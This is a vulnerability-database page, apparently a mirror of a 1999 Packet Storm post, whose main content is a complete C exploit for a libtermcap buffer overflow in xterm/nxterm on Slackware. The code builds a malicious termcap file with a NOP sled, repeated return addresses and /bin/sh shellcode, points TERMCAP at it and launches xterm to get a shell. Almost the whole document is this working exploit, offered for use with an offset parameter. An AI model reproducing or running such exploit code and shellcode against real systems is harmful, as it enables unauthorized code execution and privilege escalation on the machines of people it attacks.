Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

libtermcap_xterm_exploit.txt

🗓️ 22 Sep 1999 00:00:00Reported by Packet StormType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 18 Views

libtermcap xterm exploit code by m0f0 for executing shell commands via buffer overflow.

Code
`Subject: libtermcap xterm exploit  
To: [email protected]   
  
  
/*  
****************************************************  
*** libtermcap xterm exploit ***  
*** by m0f0 1999 ***  
*** ***  
*** it works for xterm/nxterm ***  
*** Tested Slackware 3.5, 3.6 ***  
****************************************************  
*/  
  
  
#include <stdio.h>  
#define BUF_SIZE 5000  
#define POS_RET 2000  
#define POS_SEP 3000  
#define RETADDR 0xbfffefef  
#define EGG "/tmp/egg_termcap"  
  
  
// shellcode  
char shellcode[] = // 48 caracteres  
"\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa"  
"\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04"  
"\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9\xff"  
"\xff\xff/bin/sh";  
  
  
void main (int argc, char *argv[]) {  
int i;  
FILE *f;  
char buf[BUF_SIZE];  
long retaddr, offset;  
  
printf ("\n");  
printf ("****************************************** \n");  
printf ("* libtermcap xterm exploit, by m0f0 1999 * \n");  
printf ("****************************************** \n\n");  
printf ("Use : %s [offset] \n", argv[0]);  
  
  
offset = 0;  
if (argc>1) {  
offset = atol (argv[1]);  
}  
  
  
retaddr = RETADDR + offset;  
printf ("Return Address = 0x%x \n",retaddr);  
  
  
  
// Fill buffer with NOP's  
memset (buf, 0x90, BUF_SIZE);  
buf[BUF_SIZE]=0;  
  
// Set termcap file header and sep  
memcpy (buf, "xterm|", 6);  
memcpy (buf+POS_SEP,":\\",2);  
  
  
// Return Address  
for (i=POS_RET; i<=POS_SEP-10; i+=4) {  
*(long*)(buf+i) = (long) retaddr;  
}  
  
  
// Copy shellCode  
for (i=0; i<strlen(shellcode); i++) {  
buf[i+2000] = shellcode[i];  
}  
  
  
// Write EGG_TERMCAP  
f = fopen (EGG,"w");  
fprintf (f,"%s",buf);  
fclose (f);  
  
// Export TERMCAP  
setenv ("TERMCAP", EGG, 1);  
  
  
// Run program  
execl ("/usr/X11R6/bin/xterm","xterm",NULL);  
  
  
}  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
22 Sep 1999 00:00Current
7.4High risk
Vulners AI Score7.4
libtermcap exploitxterm vulnerabilitybuffer overflowshellcode executionsecurity exploit
18